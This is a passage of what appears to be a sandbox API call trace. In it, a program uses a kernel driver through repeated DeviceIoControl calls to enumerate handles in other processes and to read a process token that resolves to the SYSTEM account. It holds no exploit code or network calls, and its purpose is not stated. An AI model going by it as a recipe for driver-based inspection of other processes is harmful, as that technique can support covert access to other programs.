Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.802] ObfDereferenceObject (Object=0xfffffa8002837920) returned 0x13 [0223.802] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.802] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.802] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xea, lpOverlapped=0x0) returned 1 [0223.802] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.802] PsAcquireProcessExitSynchronization () returned 0x0 [0223.802] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.802] ObReferenceObjectByHandle (in: Handle=0x658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003aa33e0, HandleInformation=0x0) returned 0x0 [0223.802] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.802] PsReleaseProcessExitSynchronization () returned 0x2 [0223.802] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.802] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.802] ObfDereferenceObject (Object=0xfffffa8003aa33e0) returned 0x13 [0223.802] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.802] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.802] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.802] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0223.802] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.802] PsAcquireProcessExitSynchronization () returned 0x0 [0223.802] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880052b35d0) [0223.802] ObReferenceObjectByHandle (in: Handle=0x65c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002488070, HandleInformation=0x0) returned 0x0 [0223.802] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.802] PsReleaseProcessExitSynchronization () returned 0x2 [0223.802] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xc2 [0223.802] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.803] ObfDereferenceObject (Object=0xfffffa8002488070) returned 0x11 [0223.803] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.803] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x338) returned 0xc8 [0223.803] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0223.803] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003801b30, HandleInformation=0x0) returned 0x0 [0223.803] ObOpenObjectByPointer (in: Object=0xfffffa8003801b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff8000081c) returned 0x0 [0223.803] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xd0 [0223.803] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000081c, DesiredAccess=0x8, TokenHandle=0xfffffa800313c7c0 | out: TokenHandle=0xfffffa800313c7c0*=0xc4) returned 0x0 [0223.803] ZwClose (Handle=0xffffffff8000081c) returned 0x0 [0223.803] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.803] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0223.803] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0223.806] CloseHandle (hObject=0xc4) returned 1 [0223.806] CloseHandle (hObject=0xc8) returned 1 [0223.806] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0223.806] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.806] PsAcquireProcessExitSynchronization () returned 0x0 [0223.806] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.806] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003554f20, HandleInformation=0x0) returned 0x0 [0223.806] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.806] PsReleaseProcessExitSynchronization () returned 0x2 [0223.806] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.806] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.806] ObfDereferenceObject (Object=0xfffffa8003554f20) returned 0x1 [0223.806] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.806] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.806] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.806] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.806] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.806] PsAcquireProcessExitSynchronization () returned 0x0 [0223.806] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.806] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036f7a80, HandleInformation=0x0) returned 0x0 [0223.806] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.807] PsReleaseProcessExitSynchronization () returned 0x2 [0223.807] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.807] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.807] ObfDereferenceObject (Object=0xfffffa80036f7a80) returned 0x1 [0223.807] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.807] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.807] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.807] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.807] PsAcquireProcessExitSynchronization () returned 0x0 [0223.807] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.807] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.807] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.807] PsReleaseProcessExitSynchronization () returned 0x2 [0223.807] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.807] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.807] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.807] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.807] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.807] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.807] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0223.807] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.807] PsAcquireProcessExitSynchronization () returned 0x0 [0223.807] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.807] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0223.808] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.808] PsReleaseProcessExitSynchronization () returned 0x2 [0223.808] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.808] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.808] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x25 [0223.808] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.808] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.808] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.808] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x44, lpOverlapped=0x0) returned 1 [0223.808] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.808] PsAcquireProcessExitSynchronization () returned 0x0 [0223.808] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.808] ObReferenceObjectByHandle (in: Handle=0x15c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003837da0, HandleInformation=0x0) returned 0x0 [0223.808] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.808] PsReleaseProcessExitSynchronization () returned 0x2 [0223.808] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.808] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.808] ObfDereferenceObject (Object=0xfffffa8003837da0) returned 0x1 [0223.809] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.809] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.809] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x42, lpOverlapped=0x0) returned 1 [0223.809] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.809] PsAcquireProcessExitSynchronization () returned 0x0 [0223.809] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.809] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003833dd0, HandleInformation=0x0) returned 0x0 [0223.809] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.809] PsReleaseProcessExitSynchronization () returned 0x2 [0223.809] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.809] ObQueryNameString (in: Object=0xfffffa8003410d40, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.809] ObfDereferenceObject (Object=0xfffffa8003833dd0) returned 0x1 [0223.809] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.809] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.809] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.809] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0223.809] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.809] PsAcquireProcessExitSynchronization () returned 0x0 [0223.809] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.809] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003862c80, HandleInformation=0x0) returned 0x0 [0223.809] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.809] PsReleaseProcessExitSynchronization () returned 0x2 [0223.809] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.809] ObQueryNameString (in: Object=0xfffffa8003862c80, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.810] ObfDereferenceObject (Object=0xfffffa8003862c80) returned 0x1 [0223.810] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.810] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.810] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0223.810] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.810] PsAcquireProcessExitSynchronization () returned 0x0 [0223.810] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.810] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003870f20, HandleInformation=0x0) returned 0x0 [0223.810] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.810] PsReleaseProcessExitSynchronization () returned 0x2 [0223.810] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.810] ObQueryNameString (in: Object=0xfffffa8003870f20, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.811] ObfDereferenceObject (Object=0xfffffa8003870f20) returned 0x3 [0223.811] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.811] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.811] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0223.811] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.811] PsAcquireProcessExitSynchronization () returned 0x0 [0223.811] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.811] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800387aa50, HandleInformation=0x0) returned 0x0 [0223.811] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.811] PsReleaseProcessExitSynchronization () returned 0x2 [0223.812] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.812] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.812] ObfDereferenceObject (Object=0xfffffa800387aa50) returned 0x1 [0223.812] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.812] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.812] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.812] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x56, lpOverlapped=0x0) returned 1 [0223.812] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.812] PsAcquireProcessExitSynchronization () returned 0x0 [0223.812] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.812] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fb800, HandleInformation=0x0) returned 0x0 [0223.812] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.812] PsReleaseProcessExitSynchronization () returned 0x2 [0223.812] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.812] ObQueryNameString (in: Object=0xfffffa80039fb800, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.812] ObfDereferenceObject (Object=0xfffffa80039fb800) returned 0x2 [0223.812] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.813] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.813] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0223.813] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.813] PsAcquireProcessExitSynchronization () returned 0x0 [0223.813] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.813] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fc8d0, HandleInformation=0x0) returned 0x0 [0223.813] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.813] PsReleaseProcessExitSynchronization () returned 0x2 [0223.813] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.813] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0223.813] ObfDereferenceObject (Object=0xfffffa80039fc8d0) returned 0x1 [0223.813] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.813] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0223.813] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0223.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0223.813] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0223.813] PsAcquireProcessExitSynchronization () returned 0x0 [0223.814] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880052b35d0) [0223.814] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039fe250, HandleInformation=0x0) returned 0x0 [0223.814] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0223.814] PsReleaseProcessExitSynchronization () returned 0x2 [0223.814] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0223.814] ObQueryNameString (in: Object=0xfffffa80039fe250, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0223.814] ObfDereferenceObject (Object=0xfffffa80039fe250) returned 0x14 [0223.814] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0223.814] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: 